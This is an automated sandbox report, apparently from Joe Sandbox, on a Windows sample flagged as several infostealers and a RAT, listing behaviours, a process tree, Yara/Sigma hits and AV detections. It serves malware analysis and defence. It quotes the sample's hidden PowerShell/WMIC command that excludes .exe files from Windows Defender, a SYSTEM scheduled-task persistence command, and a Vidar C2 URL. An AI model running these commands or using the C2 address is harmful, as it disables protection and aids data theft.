Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1430552
MD5:b9882fe8bb7ab2a4d094f9ff5442df1c
SHA1:e17c146530a4371e0595c195c24863935a3dee8b
SHA256:4f47d84b03f5cfa3845d1b36df5e40df984756fc6ba2d98586eb39dced212628
Tags:exex64
Infos:

Detection

Glupteba, Mars Stealer, PureLog Stealer, Stealc, Vidar, zgRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Yara detected Glupteba
Yara detected Mars stealer
Yara detected PureLog Stealer
Yara detected Stealc
Yara detected Vidar stealer
Yara detected zgRAT
Adds extensions / path to Windows Defender exclusion list (Registry)
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Checks if the current machine is a virtual machine (disk enumeration)
Creates HTML files with .exe extension (expired dropper behavior)
Disable Windows Defender real time protection (registry)
Disables Windows Defender (deletes autostart)
Drops PE files to the document folder of the user
Drops script or batch files to the startup folder
Exclude list of file types from scheduled, custom, and real-time scanning
Found Tor onion address
Found direct / indirect Syscall (likely to bypass EDR)
Hides threads from debuggers
Injects a PE file into a foreign processes
Installs new ROOT certificates
Machine Learning detection for dropped file
Modifies Group Policy settings
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Query firmware table information (likely to detect VMs)
Sample uses process hollowing technique
Sample uses string decryption to hide its real strings
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: Suspicious Scheduled Task Creation Involving Temp Folder
Suspicious powershell command line found
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes many files with high entropy
Writes to foreign memory regions
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Creates job files (autostart)
Creates or modifies windows services
Deletes files inside the Windows folder
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries keyboard layouts
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the installation date of Windows
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Windows Defender Exclusions Added - Registry
Stores files to the Windows start menu directory
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 7288 cmdline: "C:\Users\user\Desktop\file.exe" MD5: B9882FE8BB7AB2A4D094F9FF5442DF1C)
    • conhost.exe (PID: 7300 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • AddInProcess32.exe (PID: 7392 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C)
      • VtmtVe55Jwcf3rOGIU1yezyh.exe (PID: 7604 cmdline: "C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe" MD5: CCEE6D525CB5940F123C86DB6EDD40DA)
        • u5v8.0.exe (PID: 8120 cmdline: "C:\Users\user\AppData\Local\Temp\u5v8.0.exe" MD5: BCF475BE78F3965DD066CA8DABBEB31F)
        • Qg_Appv5.exe (PID: 3436 cmdline: "C:\Users\user\AppData\Local\Temp\Qg_Appv5.exe" MD5: 54D53F5BDB925B3ED005A84B5492447F)
      • 9wqoiPpK0NIQEBygxfm6h42G.exe (PID: 7740 cmdline: "C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exe" MD5: 3953BBAD77CDCB9D5AF2694EED7E6688)
        • UWxz0MPLJemfxFfuxrp6E5vU.exe (PID: 7488 cmdline: C:\Users\user\Documents\SimpleAdobe\UWxz0MPLJemfxFfuxrp6E5vU.exe MD5: A1789F6DBB08B8F49452DB52D3829002)
        • F0mqqGl9pK9gdOm2cnZsC1mR.exe (PID: 4108 cmdline: C:\Users\user\Documents\SimpleAdobe\F0mqqGl9pK9gdOm2cnZsC1mR.exe MD5: D15459E9B9D12244A57809BC383B2757)
      • i7gUU3MlvTwbsK8r3hAjzW0p.exe (PID: 7988 cmdline: "C:\Users\user\Pictures\i7gUU3MlvTwbsK8r3hAjzW0p.exe" MD5: AAA56797070369AD346FBD9BB6CC5E8B)
        • Install.exe (PID: 5660 cmdline: .\Install.exe /nxdidQZJ "385118" /S MD5: E77964E011D8880EAE95422769249CA4)
          • forfiles.exe (PID: 2552 cmdline: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True" MD5: D95C443851F70F77427B3183B1619DD3)
            • conhost.exe (PID: 7532 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • cmd.exe (PID: 7356 cmdline: /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
              • powershell.exe (PID: 7688 cmdline: powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
                • WMIC.exe (PID: 2624 cmdline: "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True MD5: E2DE6500DE1148C7F6027AD50AC8B891)
          • schtasks.exe (PID: 3060 cmdline: schtasks /CREATE /TN "bWycNackLSywaqkmgR" /SC once /ST 21:38:00 /RU "SYSTEM" /TR "\"C:\Users\user\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\koEMGMU.exe\" em /VNsite_idnLd 385118 /S" /V1 /F MD5: 48C2FE20575769DE916F48EF0676A965)
            • conhost.exe (PID: 5204 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • yPlMO3UKyKRvoEYPhbGYOyT0.exe (PID: 8132 cmdline: "C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exe" MD5: CCEE6D525CB5940F123C86DB6EDD40DA)
        • u69w.0.exe (PID: 3412 cmdline: "C:\Users\user\AppData\Local\Temp\u69w.0.exe" MD5: BCF475BE78F3965DD066CA8DABBEB31F)
        • u69w.1.exe (PID: 7208 cmdline: "C:\Users\user\AppData\Local\Temp\u69w.1.exe" MD5: 397926927BCA55BE4A77839B1C44DE6E)
      • B46afLBMY0mokUgVdA9CQR52.exe (PID: 5664 cmdline: "C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exe" MD5: CCEE6D525CB5940F123C86DB6EDD40DA)
        • u4dc.0.exe (PID: 8156 cmdline: "C:\Users\user\AppData\Local\Temp\u4dc.0.exe" MD5: BCF475BE78F3965DD066CA8DABBEB31F)
      • t7IXQJi6R3tWUMJ8f9cQzMWm.exe (PID: 1940 cmdline: "C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exe" MD5: CCEE6D525CB5940F123C86DB6EDD40DA)
      • l0nXYBHJHVq6UHyy1YDO9fn3.exe (PID: 4008 cmdline: "C:\Users\user\Pictures\l0nXYBHJHVq6UHyy1YDO9fn3.exe" MD5: CCEE6D525CB5940F123C86DB6EDD40DA)
      • wr6XLbv7Ijp4TImjm1ouF4U2.exe (PID: 8088 cmdline: "C:\Users\user\Pictures\wr6XLbv7Ijp4TImjm1ouF4U2.exe" MD5: 3953BBAD77CDCB9D5AF2694EED7E6688)
      • PA8JWMmRYiQsN7iqTjOvjsbW.exe (PID: 8176 cmdline: "C:\Users\user\Pictures\PA8JWMmRYiQsN7iqTjOvjsbW.exe" MD5: F6C9E6F8396274E57FBA6BE593B90E36)
      • zUOgRazdYnb35XHU4UIsV9Yc.exe (PID: 7204 cmdline: "C:\Users\user\Pictures\zUOgRazdYnb35XHU4UIsV9Yc.exe" MD5: F6C9E6F8396274E57FBA6BE593B90E36)
      • 6dpl9L7LbyabhVQNXZXXKjGL.exe (PID: 5812 cmdline: "C:\Users\user\Pictures\6dpl9L7LbyabhVQNXZXXKjGL.exe" MD5: CCEE6D525CB5940F123C86DB6EDD40DA)
      • 0FR80IiNvxJZyXnpOgiDlYNV.exe (PID: 4252 cmdline: "C:\Users\user\Pictures\0FR80IiNvxJZyXnpOgiDlYNV.exe" MD5: F6C9E6F8396274E57FBA6BE593B90E36)
      • 68bEfZA6FBu6lC5BaADYSIdx.exe (PID: 7592 cmdline: "C:\Users\user\Pictures\68bEfZA6FBu6lC5BaADYSIdx.exe" MD5: F6C9E6F8396274E57FBA6BE593B90E36)
      • ikL90ODaFTS7N6FbOffM2D1B.exe (PID: 7852 cmdline: "C:\Users\user\Pictures\ikL90ODaFTS7N6FbOffM2D1B.exe" MD5: CCEE6D525CB5940F123C86DB6EDD40DA)
      • ka1rT1Ln7XhH1aQSgOeo3013.exe (PID: 3956 cmdline: "C:\Users\user\Pictures\ka1rT1Ln7XhH1aQSgOeo3013.exe" MD5: 3953BBAD77CDCB9D5AF2694EED7E6688)
      • G3pV8gTsWQBVrGpK4ooPrlxI.exe (PID: 5416 cmdline: "C:\Users\user\Pictures\G3pV8gTsWQBVrGpK4ooPrlxI.exe" MD5: CCEE6D525CB5940F123C86DB6EDD40DA)
      • vU4jsQbpuBQoMcavMx7b1jzX.exe (PID: 1588 cmdline: "C:\Users\user\Pictures\vU4jsQbpuBQoMcavMx7b1jzX.exe" --silent --allusers=0 MD5: 409B00F4B0A921D4691FE3EFB0AD4092)
      • OYqxk9G3x4R05N4I0KLZXbXg.exe (PID: 6752 cmdline: "C:\Users\user\Pictures\OYqxk9G3x4R05N4I0KLZXbXg.exe" MD5: F6C9E6F8396274E57FBA6BE593B90E36)
      • nxx62MIcAq1mLUazdUlt2emv.exe (PID: 4172 cmdline: "C:\Users\user\Pictures\nxx62MIcAq1mLUazdUlt2emv.exe" --silent --allusers=0 MD5: 2CF99CA2E0CB98555FCA7D2FB3187553)
  • svchost.exe (PID: 7860 cmdline: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 7868 cmdline: C:\Windows\System32\svchost.exe -k NetSvcs -p -s NcaSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 7876 cmdline: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cmd.exe (PID: 1168 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ECVVQonpjDvaVVq8u9A57jpg.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 3124 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • H6XhhPCeuwAb2QQK3C3B1Lwl.exe (PID: 3572 cmdline: "C:\Users\user\AppData\Local\H6XhhPCeuwAb2QQK3C3B1Lwl.exe" MD5: CCEE6D525CB5940F123C86DB6EDD40DA)
  • koEMGMU.exe (PID: 4868 cmdline: C:\Users\user\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\koEMGMU.exe em /VNsite_idnLd 385118 /S MD5: E77964E011D8880EAE95422769249CA4)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
GluptebaGlupteba is a trojan horse malware that is one of the top ten malware variants of 2021. After infecting a system, the Glupteba malware can be used to deliver additional malware, steal user authentication information, and enroll the infected system in a cryptomining botnet.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.glupteba
NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
NameDescriptionAttributionBlogpost URLsLink
VidarVidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.vidar
NameDescriptionAttributionBlogpost URLsLink
zgRATzgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Malware Configuration

Threatname: Vidar

{"C2 url": "http://185.172.128.76/3cd2b41cbde8fc9c.php"}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\Documents\SimpleAdobe\KPGhFRImEtP9uUl6Tmi54GCR.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
    C:\Users\user\Documents\SimpleAdobe\KPGhFRImEtP9uUl6Tmi54GCR.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
      C:\Users\user\Documents\SimpleAdobe\KPGhFRImEtP9uUl6Tmi54GCR.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
        C:\Users\user\Documents\SimpleAdobe\KPGhFRImEtP9uUl6Tmi54GCR.exeMALWARE_Win_zgRATDetects zgRATditekSHen
        • 0x9f3d7:$s1: file:///
        • 0x9f2e7:$s2: {11111-22222-10009-11112}
        • 0x9f367:$s3: {11111-22222-50001-00000}
        • 0x9e020:$s4: get_Module
        • 0x387350:$s4: get_Module
        • 0x8a805:$s5: Reverse
        • 0x8a811:$s5: Reverse
        • 0x8a819:$s5: Reverse
        • 0x9ce9a:$s6: BlockCopy
        • 0x386b22:$s7: ReadByte
        • 0x9f3e9:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
        C:\Users\user\AppData\Local\Temp\u624.1.exeJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
          Click to see the 8 entries

          Memory Dumps

          SourceRuleDescriptionAuthorStrings
          00000015.00000002.1918521862.00000000041C0000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
          • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
          00000029.00000002.2099601729.00000000041B0000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
          • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
          00000029.00000003.2080394798.0000000006A3A000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
            00000013.00000002.1917490394.000000000418C000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
            • 0xca8:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
            0000001F.00000003.1544893473.00000000041E0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
              Click to see the 36 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              10.3.u5v8.0.exe.4200000.0.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                10.3.u5v8.0.exe.4200000.0.unpackJoeSecurity_MarsStealerYara detected Mars stealerJoe Security
                  20.3.u69w.0.exe.41d0000.0.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                    20.3.u69w.0.exe.41d0000.0.unpackJoeSecurity_MarsStealerYara detected Mars stealerJoe Security
                      36.1.0FR80IiNvxJZyXnpOgiDlYNV.exe.400000.0.unpackJoeSecurity_GluptebaYara detected GluptebaJoe Security
                        Click to see the 15 entries

                        Sigma Signatures

                        System Summary

                        barindex
                        Sigma detected: Potentially Suspicious PowerShell Child Processes
                        Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True, CommandLine: "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True, CommandLine|base64offset|contains: <, Image: C:\Windows\SysWOW64\wbem\WMIC.exe, NewProcessName: C:\Windows\SysWOW64\wbem\WMIC.exe, OriginalFileName: C:\Windows\SysWOW64\wbem\WMIC.exe, ParentCommandLine: powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True, ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7688, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True, ProcessId: 2624, ProcessName: WMIC.exe
                        Sigma detected: Suspicious Scheduled Task Creation Involving Temp Folder
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks /CREATE /TN "bWycNackLSywaqkmgR" /SC once /ST 21:38:00 /RU "SYSTEM" /TR "\"C:\Users\user\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\koEMGMU.exe\" em /VNsite_idnLd 385118 /S" /V1 /F, CommandLine: schtasks /CREATE /TN "bWycNackLSywaqkmgR" /SC once /ST 21:38:00 /RU "SYSTEM" /TR "\"C:\Users\user\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\koEMGMU.exe\" em /VNsite_idnLd 385118 /S" /V1 /F, CommandLine|base64offset|contains: mj,, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: .\Install.exe /nxdidQZJ "385118" /S, ParentImage: C:\Users\user\AppData\Local\Temp\7zS1198.tmp\Install.exe, ParentProcessId: 5660, ParentProcessName: Install.exe, ProcessCommandLine: schtasks /CREATE /TN "bWycNackLSywaqkmgR" /SC once /ST 21:38:00 /RU "SYSTEM" /TR "\"C:\Users\user\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\koEMGMU.exe\" em /VNsite_idnLd 385118 /S" /V1 /F, ProcessId: 3060, ProcessName: schtasks.exe
                        Sigma detected: Suspicious Add Scheduled Task Parent
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks /CREATE /TN "bWycNackLSywaqkmgR" /SC once /ST 21:38:00 /RU "SYSTEM" /TR "\"C:\Users\user\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\koEMGMU.exe\" em /VNsite_idnLd 385118 /S" /V1 /F, CommandLine: schtasks /CREATE /TN "bWycNackLSywaqkmgR" /SC once /ST 21:38:00 /RU "SYSTEM" /TR "\"C:\Users\user\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\koEMGMU.exe\" em /VNsite_idnLd 385118 /S" /V1 /F, CommandLine|base64offset|contains: mj,, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: .\Install.exe /nxdidQZJ "385118" /S, ParentImage: C:\Users\user\AppData\Local\Temp\7zS1198.tmp\Install.exe, ParentProcessId: 5660, ParentProcessName: Install.exe, ProcessCommandLine: schtasks /CREATE /TN "bWycNackLSywaqkmgR" /SC once /ST 21:38:00 /RU "SYSTEM" /TR "\"C:\Users\user\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\koEMGMU.exe\" em /VNsite_idnLd 385118 /S" /V1 /F, ProcessId: 3060, ProcessName: schtasks.exe
                        Sigma detected: Suspicious Schtasks From Env Var Folder
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks /CREATE /TN "bWycNackLSywaqkmgR" /SC once /ST 21:38:00 /RU "SYSTEM" /TR "\"C:\Users\user\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\koEMGMU.exe\" em /VNsite_idnLd 385118 /S" /V1 /F, CommandLine: schtasks /CREATE /TN "bWycNackLSywaqkmgR" /SC once /ST 21:38:00 /RU "SYSTEM" /TR "\"C:\Users\user\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\koEMGMU.exe\" em /VNsite_idnLd 385118 /S" /V1 /F, CommandLine|base64offset|contains: mj,, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: .\Install.exe /nxdidQZJ "385118" /S, ParentImage: C:\Users\user\AppData\Local\Temp\7zS1198.tmp\Install.exe, ParentProcessId: 5660, ParentProcessName: Install.exe, ProcessCommandLine: schtasks /CREATE /TN "bWycNackLSywaqkmgR" /SC once /ST 21:38:00 /RU "SYSTEM" /TR "\"C:\Users\user\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\koEMGMU.exe\" em /VNsite_idnLd 385118 /S" /V1 /F, ProcessId: 3060, ProcessName: schtasks.exe
                        Sigma detected: Windows Defender Exclusions Added - Registry
                        Source: Registry Key setAuthor: Christian Burkard (Nextron Systems): Data: Details: 1, EventID: 13, EventType: SetValue, Image: C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exe, ProcessId: 7740, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{AF4B7D10-C04F-40BD-A9F0-1F789BBF0FCA}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Exclusions_Extensions
                        Sigma detected: Non Interactive PowerShell Process Spawned
                        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True, CommandLine: powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True, CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7356, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True, ProcessId: 7688, ProcessName: powershell.exe
                        Sigma detected: Windows Processes Suspicious Parent Directory
                        Source: Process startedAuthor: vburov: Data: Command: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc, CommandLine: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc, ProcessId: 7860, ProcessName: svchost.exe

                        Data Obfuscation

                        barindex
                        Sigma detected: Drops script at startup location
                        Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe, ProcessId: 7392, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ECVVQonpjDvaVVq8u9A57jpg.bat

                        Snort Signatures

                        No Snort rule has matched

                        Joe Sandbox Signatures

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection

                        barindex
                        Antivirus detection for dropped file
                        Source: C:\Users\user\AppData\Local\6uk7M8l1XN7kn2GGjKmOMQUi.exeAvira: detection malicious, Label: HEUR/AGEN.1313019
                        Source: C:\Users\user\AppData\Local\9JPBg0fN0RIfaIShEtttlmtW.exeAvira: detection malicious, Label: HEUR/AGEN.1313019
                        Source: C:\Users\user\AppData\Local\0yHxI2NgcVq897URfu1bGLCU.exeAvira: detection malicious, Label: HEUR/AGEN.1313019
                        Source: C:\Users\user\AppData\Local\10ff9npsu4lZrEUNQDLknd3T.exeAvira: detection malicious, Label: HEUR/AGEN.1313019
                        Source: C:\Users\user\AppData\Local\0WEfXyMPJw5gbxAkYoQ7foIu.exeAvira: detection malicious, Label: HEUR/AGEN.1313019
                        Found malware configuration
                        Source: 0000001F.00000003.1544893473.00000000041E0000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: Vidar {"C2 url": "http://185.172.128.76/3cd2b41cbde8fc9c.php"}
                        Multi AV Scanner detection for dropped file
                        Source: C:\Users\user\AppData\Local\4H9gwSn9hsmr1uT7Ln1OMxxi.exeReversingLabs: Detection: 16%
                        Source: C:\Users\user\AppData\Local\4atMces8tYoo96OnbLT8HE6O.exeReversingLabs: Detection: 16%
                        Source: C:\Users\user\AppData\Local\8FauF1Ec16N4pbn45vApMB9Y.exeReversingLabs: Detection: 16%
                        Source: C:\Users\user\AppData\Local\F9a5CAWDzjn4KX6pZMk93eNG.exeReversingLabs: Detection: 75%
                        Source: C:\Users\user\AppData\Local\H9xPrDydeyqRWbh69y5tSjbf.exeReversingLabs: Detection: 16%
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\Default12_my[1].exeReversingLabs: Detection: 21%
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\DQNVS06W\Space_my[1].exeReversingLabs: Detection: 24%
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\123p[1].exeReversingLabs: Detection: 87%
